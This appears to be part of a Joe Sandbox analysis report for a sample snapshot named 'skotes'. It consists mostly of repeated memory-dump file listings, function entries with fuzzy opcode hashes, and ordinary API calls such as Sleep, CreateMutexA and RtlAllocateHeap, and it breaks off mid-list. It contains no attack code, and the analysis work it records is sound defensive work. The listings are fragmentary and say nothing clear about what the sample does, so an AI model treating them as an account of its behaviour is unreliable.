Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 52ad35afb662c37096a924f1b4eb9dd5da01fb8b99ea4c48094fc9f97f83ec60
Instruction ID: 00c70e48a83edc8e82c64eb8d83ef00994423f1451e1a35f4f7b4d267fbf0931
Opcode Fuzzy Hash: 52ad35afb662c37096a924f1b4eb9dd5da01fb8b99ea4c48094fc9f97f83ec60
Instruction Fuzzy Hash: 2A217931744201DBEB189B6CEC8EF2EF7A5EBC1310F208218E418C76D1DBB689808712

Function 0094A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 47d75ec1ff257efaeeee1b6d0e0aee182af85debe1ea09f05683b1fa19c31d00
Instruction ID: 8c57ba8bf63dfdd214599a1605a8f9e36dc1c4fb87490038c29d84e340ac83eb
Opcode Fuzzy Hash: 47d75ec1ff257efaeeee1b6d0e0aee182af85debe1ea09f05683b1fa19c31d00
Instruction Fuzzy Hash: E0216D317D8201CAEB2467AC989FF2EF255DFC1300F244D16E508D63D1DB7A898083A3

Function 0094A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 01dcccf4581fd7d474421b054872ee2a4ac25ea46b07d382e5bb6faafabc760e
Instruction ID: aeea74bd8e39c866f6ea8ac051796ec4e853a2bc51573b54615bcd56e4a33b0d
Opcode Fuzzy Hash: 01dcccf4581fd7d474421b054872ee2a4ac25ea46b07d382e5bb6faafabc760e
Instruction Fuzzy Hash: 19217932384201DBEB18DF6CEC8AB6DF7A6DBD6310F248219E818D76D1D77699808752

Function 0097D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0097A813,00000001,00000364,00000006,000000FF,?,0097EE3F,?,00000004,00000000,?,?), ref: 0097D871

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 11ae55ec387b5c253ecf5688d3338d831c5a878f67ece3795f02f909caf4be2a
Instruction ID: 4eb35b56e27b1313a8badb1a224aa9e3e9933e424418d0a07fae6039ff1edd0b
Opcode Fuzzy Hash: 11ae55ec387b5c253ecf5688d3338d831c5a878f67ece3795f02f909caf4be2a
Instruction Fuzzy Hash: 5BF05E33657225A6EB216AA69C05BDB777DDFC6770B19C521AD0CA7181DA20E80086E2

Non-executed Functions

Function 0097CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0097CC66

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: efadfe54c9e70b0d6dc0c27bab602e9d9424d9b8d8426a3eaf09d19e8736dcc4
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 9CB137B39046459FDB21CF68C8817AEBBE9EF45340F18C56EE859EB382D6348D01CB60

Function 00942EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00942F5F
__Mtx_unlock.LIBCPMT ref: 00942FCC
__Mtx_unlock.LIBCPMT ref: 009430F5
__Mtx_unlock.LIBCPMT ref: 0094319B

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
